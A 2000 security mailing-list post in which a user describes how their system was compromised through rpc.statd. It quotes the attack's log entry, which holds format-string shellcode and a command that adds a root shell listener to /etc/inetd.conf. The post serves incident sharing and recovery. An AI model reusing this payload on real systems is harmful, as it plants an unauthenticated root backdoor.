Security Incidents mailing list archives
You guys were right
From: c_patin () HOTMAIL COM
Date: Sun, 27 Aug 2000 21:39:59 -0000
First off, I just want to thank everyone who responded to my "Widespread Hole" message. You were all right, it wasn't a hole in an installed package at all. It was a compromise in rpc.statd. I have checked my logs and located the following hack that I wanted to share: Aug 12 07:43:14 mymachine rpc.statd[458]: SM_MON request for hostname containing '/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V¸Í1Û ë#Ø@Íè°ÿÿÿ/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd This was the hack that was used to compromise the system. The /etc/inetd.conf file had a modified date of August 12th, so I was able to scan the logs based on that date and sure enough, the above item was found. I've completely formatted my system and installed all available patches and placed a hardware firewall in front of my machine. I've also installed Tripwire, so I should be able to tell when something like this happens again. Thanks again for all the suggestions, Carey
Current thread:
- You guys were right c_patin (Aug 27)
